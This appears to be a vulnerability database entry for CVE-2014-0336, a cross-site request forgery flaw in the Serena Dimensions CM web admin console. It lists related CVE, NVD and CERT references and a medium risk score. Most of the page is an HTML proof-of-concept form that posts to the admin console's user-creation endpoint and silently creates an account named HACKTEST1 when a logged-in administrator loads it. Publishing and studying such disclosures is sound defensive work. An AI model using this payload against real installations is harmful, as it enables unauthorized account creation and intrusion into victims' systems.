Serena Dimensions CM跨站请求伪造漏洞

🗓️ 11 Mar 2014 00:00:00Reported by RootType

Serena Dimensions CM Cross Site Request Forgery Vulnerabilit

Reporter	Title	Published	Views	Family All 6
CVE	CVE-2014-0336	6 Mar 201411:00	–	cve
Cvelist	CVE-2014-0336	6 Mar 201411:00	–	cvelist
EUVD	EUVD-2014-0374	7 Oct 202500:30	–	euvd
NVD	CVE-2014-0336	6 Mar 201411:55	–	nvd
Prion	Cross site request forgery (csrf)	6 Mar 201411:55	–	prion
CERT	Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities	5 Mar 201400:00	–	cert


                                                &lt;html&gt;
&lt;!-- CSRF PoC --&gt;
&lt;body&gt;
&lt;form 
action=&quot;http://testhost:8080/adminconsole/?jsp=user_new_master&amp;target=merant.adm.dimensions.objects.
User&amp;create=yes&quot; method=&quot;POST&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;user&amp;#95;dept&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;id&quot; value=&quot;HACKTEST1&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;USER&amp;#95;CURWORKSET&quot; value=&quot;&amp;#37;24GENERIC&amp;#37;3a&amp;#37;24GLOBAL&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;isUserEdit&quot; value=&quot;false&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;user&amp;#95;site&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;user&amp;#95;phone&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;AUTOMATIC&amp;#95;LOGIN&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;user&amp;#95;group&amp;#95;id&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;null&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;DIALOG&amp;#95;MODE&quot; value=&quot;MODE&amp;#37;5fCREATE&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;user&amp;#95;full&amp;#95;name&quot; value=&quot;HACKTEST1&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;projectPicker&quot; value=&quot;&amp;#37;24GENERIC&amp;#37;3a&amp;#37;24GLOBAL&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;wait&amp;#95;until&amp;#95;loaded&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;projectPickerUid&quot; value=&quot;1&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;GROUPS&amp;#95;ASSIGNED&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;&amp;#45;AdmAttrNames&amp;#46;email&quot; 
value=&quot;ken1&amp;#37;2ecijsouw&amp;#37;40sincerus&amp;#37;2enl&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
&lt;/form&gt;
&lt;/body&gt;

11 Mar 2014 00:00Current

6.6Medium risk

Vulners AI Score6.6

EPSS0.00144